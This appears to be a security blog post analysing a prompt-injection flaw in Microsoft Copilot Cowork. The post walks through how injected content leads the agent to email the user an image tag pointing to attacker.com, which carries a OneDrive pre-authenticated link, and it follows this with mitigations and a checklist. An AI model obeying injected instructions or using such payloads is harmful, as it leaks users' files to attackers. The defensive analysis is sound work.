Microsoft Copilot Cowork shipped with a vulnerability that turns agent-to-user notifications into a data exfiltration channel. The attack surface is not the tool call itself but the rendering context where the agent’s output appears.
The vulnerability combines three architectural decisions:
- Agents can send emails to the user’s inbox without approval
- Those emails render external images that trigger network requests
- OneDrive pre-authenticated download links can be embedded in the message body
When a prompt injection succeeds, the agent generates an email containing an image tag pointing to an attacker-controlled domain. The URL includes a OneDrive pre-authenticated link as a query parameter. When the user opens the email, their mail client fetches the image and leaks the file access token to the attacker.
This is not a theoretical attack. It affected a shipping enterprise product.
The Lethal Trifecta in Production
Simon Willison calls this the “lethal trifecta”: prompt injection plus tool permissions plus display context. Most agent security writing focuses on the first two. The display layer is where the exfiltration actually happens.
The flow:
- Attacker injects a prompt via a document, email, or web page the agent processes
- Agent generates a message with embedded external image:
<img src="https://attacker.com/log?token=https://onedrive.live.com/download?cid=ABC123&authkey=XYZ"> - Agent calls the “send email to user” tool (no approval required)
- User opens email in Outlook or webmail
- Mail client fetches the image, sending the OneDrive token to the attacker
- Attacker downloads the file using the leaked pre-authenticated link
The agent never directly calls a “send file to external server” tool. It uses an approved notification channel and relies on the email client’s rendering behavior to complete the exfiltration.
Permission Boundary Confusion
The core failure is treating “notify user” and “act on behalf of user” as the same permission tier.
Agents typically have three communication modes:
| Mode | Approval | Rendering | Exfiltration Risk |
|---|---|---|---|
| Internal response | None | Sandboxed UI | Low (if sandbox enforces CSP) |
| Notification to user | None | Full email/Slack rendering | High (external images, links) |
| Outbound message | Required | N/A (user reviews before send) | Low (user sees content) |
Copilot Cowork treated mode 2 like mode 1. The agent could send emails without approval because they were “just notifications.” But those notifications rendered in a full email client with external resource loading enabled.
The fix requires either:
- Sandboxing agent-generated emails (strip external images, disable link previews)
- Requiring approval for any message that leaves the agent’s controlled UI
- Treating “send email to user” as equivalent to “send email on behalf of user”
Pre-Authenticated Links as Exfiltration Primitives
OneDrive and SharePoint generate pre-authenticated download links for sharing. These tokens are bearer credentials: anyone with the URL can download the file.
When an agent has permission to:
- Read files from OneDrive
- Generate sharing links
- Send messages to external channels
You have an exfiltration path. The agent doesn’t need to upload the file anywhere. It just needs to generate a link and send it somewhere the attacker can observe.
This applies to any cloud storage with pre-authenticated URLs:
- AWS S3 presigned URLs
- Google Cloud Storage signed URLs
- Azure Blob Storage SAS tokens
- Dropbox shared links
The mitigation is not to block link generation. It’s to ensure that any action that creates a bearer credential and transmits it outside the agent’s sandbox requires explicit user approval.
Rendering Context as Attack Surface
Email clients are designed to render rich content. That means:
- External images load automatically (unless user has disabled them)
- Link previews fetch metadata from target URLs
- Tracking pixels are standard practice
- CSS can trigger network requests via
url()references
When you display agent-generated content in an email client, you inherit all of these behaviors. The agent doesn’t need to exploit a vulnerability in the email client. It just needs to use standard HTML features.
The same risk exists for:
- Slack messages (link previews, image embeds)
- Microsoft Teams (similar rendering)
- Browser notifications (if they allow rich content)
- Mobile push notifications (if they fetch images)
If your agent can send content to any of these channels without approval, and that content can reference external resources, you have an exfiltration vector.
Approval Flow Patterns
The fix is to distinguish between:
- Display to user in controlled context: Agent UI, sandboxed iframe, CSP-enforced page
- Transmit to user via external channel: Email, Slack, SMS, push notification
For the second category, you need approval before the message leaves your infrastructure. The approval UI should:
- Show the full message content including all links and image URLs
- Highlight any external domains referenced
- Display any file access tokens or credentials embedded in the content
- Require explicit confirmation before sending
This is expensive in terms of user friction. But the alternative is treating every notification channel as a potential data leak.
Implementation Checklist
If you’re building an agent that can send messages:
- Sandbox agent responses: Use CSP to block external resources in your UI
- Strip external content: Remove
<img>,<link>,<script>tags from agent-generated messages before displaying them - Require approval for external channels: Treat email, Slack, SMS as high-privilege actions
- Audit pre-authenticated link generation: Log every time an agent creates a sharing link or presigned URL
- Monitor outbound requests: Alert when agent-generated content triggers external network requests
- Rate-limit notifications: Cap how many emails/messages an agent can send per hour
The last point matters because even with approval, a compromised agent can spam the user with approval requests until they click through without reading.
Technical Verdict
Use agent-to-user notifications when:
- Messages render in a sandboxed UI you control
- External resources are blocked by CSP
- The agent cannot generate bearer credentials (pre-authenticated links)
Require approval when:
- Messages render in email clients, Slack, or other external channels
- Content may include external images or links
- The agent has permission to generate file sharing links
Avoid entirely when:
- You cannot sandbox the rendering context
- The agent has broad file access and can generate pre-authenticated URLs
- User approval flows are not practical for your use case
The Copilot Cowork vulnerability shows that even major vendors get this wrong. The attack surface is not just the tools you give the agent. It’s also where the agent’s output gets displayed and what network requests that display context will make on behalf of the user.
Source Links
- Microsoft Copilot Cowork Exfiltrates Files (Simon Willison)